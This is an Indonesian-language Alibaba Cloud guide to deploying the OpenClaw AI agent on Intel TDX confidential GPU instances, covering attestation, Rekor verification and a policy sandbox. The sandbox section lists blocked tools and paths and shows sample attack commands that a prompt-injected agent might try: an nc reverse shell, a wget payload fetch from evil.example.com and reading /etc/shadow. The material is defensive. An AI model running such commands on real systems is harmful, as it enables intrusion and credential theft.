All Products
Search
Document Center

Elastic GPU Service:Bangun agen AI rahasia OpenClaw pada instans komputasi rahasia heterogen

Last Updated:Jun 23, 2026

Saat runtime, agen AI memproses percakapan pengguna, memanggil alat eksternal, serta mengelola memori jangka panjang dan kredensial layanan, sehingga menghasilkan permukaan serangan yang jauh lebih besar dibandingkan aplikasi tradisional. Instans komputasi rahasia heterogen gn8v-tee dari Alibaba Cloud memanfaatkan kemampuan Intel TDX dan komputasi rahasia GPU NVIDIA untuk menyediakan Lingkungan Eksekusi Tepercaya (TEE) yang lengkap. Dengan menerapkan framework agen AI open-source OpenClaw pada instans ini, Anda dapat mencapai perlindungan data tingkat perangkat keras, attestation jarak jauh, dan verifikasi rantai pasok, sehingga menjamin keamanan ujung ke ujung untuk inferensi model dan interaksi pengguna.

Ikhtisar

Topik ini menjelaskan solusi Confidential Agent yang menerapkan OpenClaw pada instans gn8v-tee yang mendukung Intel TDX (Trust Domain Extensions). Model Qwen3.6-35B-A3B Mixture of Experts (MoE) dijalankan secara lokal pada instans tersebut, sehingga eksekusi agen dan inferensi model sepenuhnya diselesaikan dalam domain tepercaya TDX tanpa memanggil layanan API pihak ketiga apa pun. Input pengguna, bobot model, status antara inferensi, dan output AI tidak pernah meninggalkan batas kepercayaan instans rahasia selama pemrosesan.

Catatan

gn8v-tee adalah keluarga instans komputasi rahasia berbasis GPU yang dirilis oleh Alibaba Cloud. Instans ini mengintegrasikan enkripsi perangkat keras Intel TDX dan akselerasi GPU NVIDIA untuk memenuhi persyaratan kinerja inferensi AI sekaligus kepatuhan terhadap keamanan data. Topik ini menggunakan ecs.gn8v-tee.4xlarge sebagai contoh, yang menjalankan Alibaba Cloud Linux 3 di zona cn-beijing-l. Untuk beban kerja yang lebih besar, Anda dapat melakukan penskalaan ke tipe instans multi-GPU.

Arsitektur keamanan

Semua data inti dalam penerapan Confidential Agent beredar di dalam batas TEE. Tiga jenis aset berikut dilindungi secara ketat:

Aset yang dilindungi

Deskripsi

Privasi percakapan pengguna

Input pengguna, konteks eksekusi alat, dan respons AI, yang mungkin berisi informasi sensitif seperti informasi identitas pribadi (PII), catatan medis, dan data keuangan.

Memori dan status agen

Memori jangka panjang, konfigurasi, dan file SKILL dalam OpenClaw, yang seiring waktu menjadi target bernilai tinggi.

Kredensial layanan

Kredensial OAuth untuk platform IM seperti DingTalk, Kunci API eksternal, dan token gerbang.

Arsitektur keamanan mencakup lima lapisan dari bawah ke atas: perangkat keras, rantai boot, runtime, manajemen kunci, dan komunikasi:

Lapisan perlindungan

Mekanisme

Perangkat keras

Intel TDX Memory Encryption Engine (MEE) mengenkripsi semua memori guest secara transparan. Penyedia cloud tidak dapat membaca teks biasa.

Rantai boot

UKI (Unified Kernel Image) + dm-verity rootfs untuk perlindungan dari perubahan. Attestation jarak jauh memverifikasi integritas runtime. Nilai referensi rantai pasok dicatat dalam log transparansi Rekor.

Runtime

Sandbox kebijakan PEP memblokir perintah berisiko tinggi dan akses ke path sensitif, mencegah peningkatan hak istimewa akibat prompt injection.

Manajemen kunci

Kunci enkripsi disk disuntikkan melalui tantangan attestation jarak jauh saat boot dan disimpan secara lokal oleh pengguna. Penyedia cloud tidak terlibat.

Komunikasi

Enkripsi end-to-end RATS-TLS. Saluran terenkripsi hanya dibentuk setelah attestation jarak jauh memverifikasi identitas instans. Semua komunikasi dienkripsi saat transit.

Alur kerja penerapan

  1. Audit kode sumber: Penerap melakukan audit kode sumber bisnis untuk memastikan tidak ada kode berbahaya atau backdoor.

  2. Buat artefak dan publikasikan nilai referensi perangkat lunak: Bangun citra OS ringan yang hanya berisi layanan OpenClaw dari kode sumber yang telah diaudit, lalu unggah tanda tangan SLSA dari artefak build ke log transparansi Rekor untuk mempublikasikan nilai referensi perangkat lunak.

  3. Buat instans rahasia: Buat instans komputasi rahasia gn8v-tee dengan menggunakan citra yang telah dibangun.

  4. Audit attestation jarak jauh dan unggah sumber daya rahasia: Penerap menggunakan alat penerapan untuk melakukan attestation jarak jauh pada instans guna memverifikasi bahwa instans tersebut berjalan pada perangkat keras TDX asli. Setelah diverifikasi, sumber daya rahasia seperti kunci enkripsi disk dan kredensial bot DingTalk diunggah secara otomatis.

  5. Akses OpenClaw: Pengguna dapat mengakses OpenClaw secara langsung melalui browser web, klien desktop, atau terminal TUI, atau secara tidak langsung melalui platform IM seperti DingTalk.

  6. Audit attestation jarak jauh dan transmisi terenkripsi: Sebelum membuat koneksi, klien gerbang tepercaya mengambil nilai referensi perangkat lunak dari Rekor dan nilai referensi perangkat keras dari Intel PCCS dan RIM/OCSP. Setelah verifikasi attestation jarak jauh selesai, saluran terenkripsi RATS-TLS dibentuk. Semua komunikasi dienkripsi end-to-end.

Prasyarat

  • Anda telah mengaktifkan Alibaba Cloud ECS dan akun Anda memiliki izin untuk membuat instans gn8v-tee.

  • Anda telah menyiapkan instans ECS yang menjalankan Alibaba Cloud Linux 3 (tipe general-purpose atau lainnya) sebagai mesin penerapan, dengan ruang disk tersedia minimal 80 GB.

    Penting

    Mesin penerapan hanya digunakan untuk operasi penerapan. Instans general-purpose sudah cukup. Anda tidak perlu menggunakan instans gn8v-tee. Pada langkah-langkah berikutnya, Anda akan menjalankan perintah pada mesin penerapan untuk membuat instans gn8v-tee.

  • Anda telah memperoleh Pasangan Kunci Akses Alibaba Cloud. Kami merekomendasikan penggunaan peran RAM atau kredensial sementara STS.

  • Jika Anda perlu menggunakan integrasi DingTalk, Anda telah membuat aplikasi perusahaan internal DingTalk dan memperoleh kredensial yang diperlukan.

Prosedur

Langkah 1: Bangun citra tepercaya yang berisi OpenClaw dan mesin inferensi vLLM

Selesaikan tugas-tugas berikut pada mesin penerapan (instans Alibaba Cloud Linux 3): unduh kode sumber, instal dependensi, hasilkan kunci, konfigurasikan sumber daya cloud, dan bangun citra tepercaya.

  1. Login ke instans ECS.

    1. Buka Konsol ECS - Instans. Di pojok kiri atas, pilih wilayah dan kelompok sumber daya untuk instans target.

    2. Buka halaman detail instans target. Klik Connect dan pilih Workbench. Atur metode koneksi ke Terminal Connection, masukkan username dan password Anda, lalu login ke terminal grafis.

  2. Unduh kode sumber proyek.

    cd ~/
    git clone https://github.com/inclavare-containers/confidential-agent
    cd confidential-agent
  3. Instal semua dependensi perangkat lunak yang diperlukan.

    make install-deps

    Perintah ini secara otomatis menginstal Docker, Terraform, Go, Python, cosign, rekor-cli, dan alat lain yang diperlukan untuk pembuatan dan penerapan.

  4. Hasilkan kunci enkripsi dan file konfigurasi yang diperlukan untuk penerapan.

    make generate-secrets

    Setelah kunci dihasilkan, edit secrets/openclaw-vllm.json dan ganti placeholder dengan nilai aktual, seperti kredensial aplikasi DingTalk dan konfigurasi model. Tabel berikut menjelaskan placeholder tersebut:

    Placeholder

    Deskripsi

    Cara memperoleh

    <DINGTALK_BOT_CLIENT_ID>

    DingTalk bot ClientId

    Lihat DingTalk Bot + OpenClaw. Buat aplikasi di DingTalk Developer Portal untuk memperoleh nilainya.

    <DINGTALK_BOT_CLIENT_SECRET>

    DingTalk bot ClientSecret

    Seperti di atas. Peroleh nilainya dari halaman detail aplikasi.

  5. Konfigurasikan file variabel Terraform.

    Catatan

    Terraform adalah alat Infrastructure as Code (IaC) open-source yang memungkinkan Anda mengotomatiskan pembuatan, modifikasi, dan manajemen versi berbagai sumber daya dan layanan cloud di Alibaba Cloud dengan menulis file konfigurasi deklaratif. Dalam solusi ini, Terraform digunakan untuk mengotomatiskan penerapan instans rahasia.

    cp terraform/terraform.tfvars.example terraform/terraform.tfvars

    Edit file terraform/terraform.tfvars dan konfigurasikan parameter kunci seperti yang dijelaskan dalam tabel berikut.

    Parameter

    Nilai yang direkomendasikan

    Deskripsi

    zone_id

    "cn-beijing-l"

    Zona yang mendukung keluarga instans gn8v-tee

    vpc_cidr

    "10.0.0.0/16"

    Blok CIDR VPC

    vswitch_cidr

    "10.0.1.0/24"

    Blok CIDR vSwitch

    security_group_allowed_cidr

    Blok CIDR IP lingkungan klien yang perlu mengakses layanan OpenClaw

    Rentang IP sumber yang diizinkan oleh grup keamanan

    Penting

    Nilai default security_group_allowed_cidr adalah 0.0.0.0/0. Di lingkungan produksi, Anda harus mengubah nilai ini menjadi blok CIDR IP tertentu dan hanya mengizinkan alamat IP sumber yang diperlukan.

  6. Ekspor kredensial akses Alibaba Cloud Anda agar Terraform dapat membuat sumber daya cloud.

    export ALICLOUD_ACCESS_KEY="<YOUR_ACCESS_KEY>"
    export ALICLOUD_SECRET_KEY="<YOUR_SECRET_KEY>"
    Catatan

    Kami merekomendasikan penggunaan peran RAM atau kredensial sementara (STS) untuk menghindari penyimpanan jangka panjang Pasangan Kunci Akses. Untuk informasi tentang cara membuat Pasangan Kunci Akses, lihat Buat Pasangan Kunci Akses.

  7. Bangun citra tepercaya yang berisi OpenClaw dan mesin inferensi vLLM.

    make build PROFILE=openclaw-vllm
    Catatan

    Pembuatan pertama kali melibatkan langkah-langkah seperti instalasi driver GPU. Harap bersabar.

    Setelah pembuatan selesai, dua citra berikut dihasilkan:

    Jenis citra

    Deskripsi

    Citra produksi

    Versi yang diperkeras keamanannya dengan server SSH dihapus dan hanya menyisakan runtime minimal, untuk penerapan produksi

    Citra debug

    Mempertahankan akses SSH dan alat debugging, hanya untuk troubleshooting

    Selama proses pembuatan, nilai referensi citra juga diunggah ke log transparansi Rekor. File metadata .rekor-meta.json dihasilkan untuk verifikasi selama penerapan.

Langkah 2: Terapkan citra tepercaya ke instans

Terapkan citra tepercaya ke instans gn8v-tee dan bentuk saluran terenkripsi end-to-end melalui TNG.

  1. Pada mesin penerapan, jalankan perintah berikut untuk membuat instans gn8v-tee dengan menggunakan citra tepercaya. Setelah instans dibuat, attestation jarak jauh dilakukan pada instans tersebut dan sumber daya rahasia diunggah.

    make deploy PROFILE=openclaw-vllm RV_MODE=rekor

    Tabel berikut menjelaskan parameter kunci:

    Parameter

    Deskripsi

    PROFILE=openclaw-vllm

    Menentukan profil penerapan

    RV_MODE=rekor

    Memverifikasi integritas nilai referensi citra melalui log transparansi Rekor selama penerapan

    Proses penerapan membuat sumber daya berikut di cloud:

    • Bucket OSS: Ruang penyimpanan privat yang digunakan untuk mengunggah dan menyimpan citra VM tepercaya (.qcow2).

    • Citra kustom ECS: Diimpor dari file citra OSS ke pustaka citra kustom Alibaba Cloud ECS.

    • Instans komputasi rahasia ECS GPU: Instans komputasi rahasia ecs.gn8v-tee.4xlarge yang dilampirkan ke grup keamanan dan vSwitch. Parameter boot UKI mencakup konfigurasi tantangan attestation jarak jauh.

    • Grup keamanan: Membuka SSH (port 22) dan TNG (port 18789), hanya mengizinkan akses dari blok CIDR yang ditentukan.

    Catatan

    Secara default, citra Debug diterapkan. Untuk menerapkan citra Produksi (tanpa akses SSH), tentukan file citra secara manual.

    Penting

    Selama penerapan, citra diunggah ke OSS dan model diunduh dari ModelScope, yang memerlukan akses Internet dan menimbulkan biaya trafik.

  2. Jalankan TNG Client pada mesin penerapan untuk membentuk saluran terenkripsi RATS-TLS antara mesin penerapan dan instans gn8v-tee berbasis cloud.

    make connect-tng

    Setelah koneksi berhasil, output berisi URL HTTP dan WebSocket serta token akses yang diperlukan untuk mengakses OpenClaw. Semua komunikasi selanjutnya dilindungi oleh enkripsi RATS-TLS.

  3. Periksa apakah layanan OpenClaw siap melalui saluran data TNG.

    curl -s http://localhost:18789/health

    Setelah status sehat dikembalikan, Anda dapat melanjutkan untuk mengakses layanan.

Langkah 3: Akses layanan OpenClaw yang dilindungi oleh komputasi rahasia

Setelah layanan siap, Anda dapat mengakses layanan OpenClaw melalui empat metode berikut.

Metode 1: Melalui obrolan DingTalk

Temukan bot yang telah dikonfigurasi di DingTalk dan kirim pesan untuk memulai percakapan dengan OpenClaw.

image

Metode 2: Melalui UI web berbasis browser

Persiapan: Bentuk penerusan port dari mesin lokal ke mesin penerapan

Perintah make connect-tng pada Langkah 2 dijalankan pada mesin penerapan dan mengikat saluran data TNG ke localhost:18789 pada mesin penerapan. Anda perlu mengatur penerusan port SSH dari mesin lokal ke mesin penerapan:

ssh -L 18789:127.0.0.1:18789 root@<deployment machine IP>

Setelah penerusan port dibentuk, mengakses localhost:18789 di browser atau klien pada mesin lokal Anda setara dengan mengakses saluran data TNG pada mesin penerapan.

Akses melalui browser

Setelah penerusan port SSH diatur pada mesin lokal Anda, buka http://localhost:18789/openclaw di browser Anda untuk membuka panel kontrol web. Masukkan token OpenClaw yang diperoleh pada Langkah 2 untuk mengakses layanan.

image

Metode 3: Melalui klien desktop OpenClaw

Persiapan: Bentuk penerusan port dari mesin lokal ke mesin penerapan

Perintah make connect-tng pada Langkah 2 dijalankan pada mesin penerapan dan mengikat saluran data TNG ke localhost:18789 pada mesin penerapan. Anda perlu mengatur penerusan port SSH dari mesin lokal ke mesin penerapan:

ssh -L 18789:127.0.0.1:18789 root@<deployment machine IP>

Setelah penerusan port dibentuk, mengakses localhost:18789 di browser atau klien pada mesin lokal Anda setara dengan mengakses saluran data TNG pada mesin penerapan.

Akses melalui klien desktop

Instal klien desktop OpenClaw pada mesin lokal Anda, konfigurasikan mode remote, atur alamat koneksi ke ws://localhost:18789, dan masukkan token OpenClaw yang diperoleh pada Langkah 2.

Metode 4: Melalui TUI OpenClaw

Instal OpenClaw sebagai klien pada mesin penerapan:

npm install -g openclaw@latest --registry=https://registry.npmmirror.com

Kemudian jalankan perintah berikut pada mesin penerapan untuk memulai TUI OpenClaw dan terhubung ke instans OpenClaw remote:

openclaw tui --url ws://localhost:18789 --token <gateway-token>

Ganti <gateway-token> dengan token gerbang OpenClaw yang diperoleh pada Langkah 2.

Catatan

Pertama kali Anda terhubung melalui TUI, pesan pairing required ditampilkan. Buka http://localhost:18789/openclaw di browser Anda, temukan perangkat yang menunggu otorisasi pada halaman Nodes, lalu klik Approve untuk menyelesaikan otorisasi. Kemudian kembali ke TUI.

Setelah otorisasi selesai, TUI siap untuk percakapan:

image

Langkah 4 (opsional): Lepaskan sumber daya

Saat Anda tidak lagi memerlukan layanan, jalankan perintah berikut untuk melepaskan semua sumber daya cloud:

make destroy PROFILE=openclaw-vllm
Peringatan

Operasi ini tidak dapat dikembalikan dan menghapus instans ECS serta sumber daya jaringan terkait. Pastikan Anda tidak lagi memerlukan data pada instans sebelum menjalankan perintah ini.

Verifikasi keamanan

Verifikasi keandalan lingkungan runtime

OpenClaw memiliki skill bawaan tdx-remote-attestation yang secara otomatis memicu attestation jarak jauh saat pertanyaan terkait keamanan diajukan, memverifikasi status keamanan lingkungan runtime saat ini.

Cara memicu: Ajukan pertanyaan terkait keamanan di DingTalk, Web, atau TUI, seperti "Apakah data saya aman?" atau "Apakah lingkungan ini tepercaya?"

Konten yang dikembalikan:

Item verifikasi

Deskripsi

Status kepercayaan perangkat keras

Nilai perangkat keras 32 atau lebih rendah menunjukkan verifikasi berhasil

Jenis TEE

Intel TDX Trust Domain

Perlindungan enkripsi memori

Memastikan Memory Encryption Engine diaktifkan

Integritas rantai boot UKI

Memverifikasi konsistensi nilai pengukuran komponen

image (1)

Verifikasi penerapan kebijakan PEP

PEP (Policy Enforcement Point) adalah mekanisme gating runtime yang dirancang untuk agen AI rahasia. Saat agen seperti OpenClaw mengeksekusi perintah melalui alat exec, permintaan terlebih dahulu melewati cai-pep untuk pencocokan kebijakan, lalu dijalankan dalam sandbox Docker terisolasi (mode jaringan none). Kebijakan yang dapat dikonfigurasi memberlakukan pembatasan wajib pada alat yang tersedia bagi agen, mencegah risiko keamanan akibat prompt injection berbahaya.

PEP menyediakan tiga lapisan perlindungan:

  1. Pemblokiran tingkat perintah: Menolak perintah berisiko tinggi berdasarkan daftar blokir, seperti curl, wget, nc, ssh, dan docker.

  2. Pemblokiran tingkat path: Mencegah akses ke path sensitif, seperti /etc, /proc, /root, dan /home/openclaw/.openclaw.

  3. Isolasi jaringan: Sandbox tidak memiliki akses jaringan. Bahkan jika perintah melewati daftar blokir, perintah tersebut tidak dapat membuat koneksi keluar.

File kebijakan default terletak di ~/confidential-agent/image/customize/files/cai-pep-default-policy.json pada mesin penerapan. Anda dapat memodifikasi daftar blokir perintah, daftar blokir path, dan batas sumber daya sebelum membangun citra.

Jika agen dikompromikan oleh prompt injection berbahaya, dan penyerang mencoba membuat reverse shell atau mengunduh muatan berbahaya, PEP secara otomatis memblokir operasi berisiko tinggi ini:

Metode serangan

Contoh perintah

Alasan pemblokiran

Reverse shell

nc 10.0.0.99 4444 -e /bin/bash

nc ada dalam daftar blokir perintah

Unduh muatan berbahaya

wget http://evil.example.com/payload.sh

wget ada dalam daftar blokir perintah

Baca file sensitif

cat /etc/shadow

/etc/shadow cocok dengan awalan path /etc

Verifikasi integritas rantai pasok

Proses penerapan secara default menggunakan log transparansi Rekor untuk menyimpan nilai referensi citra. Selama attestation jarak jauh, nilai referensi secara otomatis diambil dari Rekor untuk verifikasi. Anda dapat mengaudit entri log Rekor untuk memverifikasi integritas rantai pasok dengan menggunakan metode berikut.

Lihat catatan Rekor

Setelah pembuatan selesai, Anda dapat menemukan indeks log dan URL entri catatan pada mesin penerapan:

cat ~/confidential-agent/image/output/slsa-output-cai-openclaw-vllm-debug-*/rekor-v1-upload.txt

Contoh output:

Created entry at index 1205944956, available at: https://rekor.sigstore.dev/api/v1/log/entries/<uuid>

Verifikasi bukti inklusi

Bukti inklusi mengonfirmasi bahwa entri yang berisi nilai referensi citra ada dalam Merkle Root log Rekor.

rekor-cli verify --log-index 1205944956 --rekor_server https://rekor.sigstore.dev

Jika output berisi dua nilai hash yang identik, verifikasi berhasil:

Computed Root Hash: 1291abcee27148a4c00241ba8719f798ce060e8a5ccc8b18249017c25c6d0090
Expected Root Hash: 1291abcee27148a4c00241ba8719f798ce060e8a5ccc8b18249017c25c6d0090

Verifikasi bukti konsistensi

Bukti konsistensi mengonfirmasi bahwa Merkle Root lama (Root A) merupakan awalan atau status historis dari Merkle Root baru (Root B), memastikan bahwa entri nilai referensi yang disimpan di Rekor tidak dimanipulasi atau dihapus.

rekor-cli loginfo --rekor_server https://rekor.sigstore.dev

Jika output berisi konten berikut, verifikasi berhasil:

Verification Successful!

Konfigurasi grup keamanan

Selama proses make deploy, aturan grup keamanan dibuat secara otomatis. Jika Anda perlu memodifikasi grup keamanan nanti, pastikan grup tersebut berisi aturan berikut:

Port

Protokol

Deskripsi

Rekomendasi keamanan

22

TCP

Manajemen remote SSH (hanya untuk citra Debug)

Batasi IP sumber ke jaringan manajemen

18789

TCP

Titik akhir saluran data TNG (RATS-TLS), digunakan untuk mengakses layanan OpenClaw

Batasi IP sumber atau akses melalui TNG

Penting: Di lingkungan produksi, pastikan untuk mengubah security_group_allowed_cidr menjadi blok CIDR IP manajemen tertentu. Hindari penggunaan 0.0.0.0/0.

FAQ

  • make build gagal dengan error dependensi yang hilang

    Verifikasi bahwa semua dependensi telah diinstal dan periksa apakah ruang disk mencukupi:

    make install-deps
    df -h /

    Jika masalah belum terselesaikan, jalankan make clean-image untuk membersihkan artefak build dan coba lagi.

  • make deploy gagal dengan NoSetRoletoECSServiceAcount

    Error ini menunjukkan bahwa peran impor citra ECS belum diotorisasi. Lakukan salah satu operasi berikut:

    • Login ke konsol Alibaba Cloud, buka ECS > Images > Import Image, lalu klik Authorize untuk membuat peran AliyunECSImageImportDefaultRole.

    • Di konsol RAM, berikan kebijakan AliyunOSSFullAccess kepada peran AliyunECSImageImportDefaultRole.

  • Layanan tidak merespons

    1. Verifikasi bahwa citra Debug diterapkan (citra Produksi tidak menyertakan SSH).

    2. Terapkan ulang dan verifikasi bahwa make deploy selesai tanpa error.

    3. Terapkan citra Debug dan hubungkan melalui SSH untuk memeriksa log guna troubleshooting.

  • Verifikasi TNG lokal gagal

    Verifikasi bahwa container Trustee lokal sedang berjalan dan sehat:

    # Verifikasi container Trustee lokal sedang berjalan
    docker ps | grep cai-local-trustee
    
    # Periksa status kesehatan Trustee
    curl http://127.0.0.1:18081/api/health
    
    # Jika Trustee belum siap, jalankan ulang
    make connect-tng
  • cai-pep menolak semua panggilan alat

    Terapkan citra Debug dan hubungkan melalui SSH untuk memeriksa log cai-pep guna mengetahui alasan spesifik pemblokiran.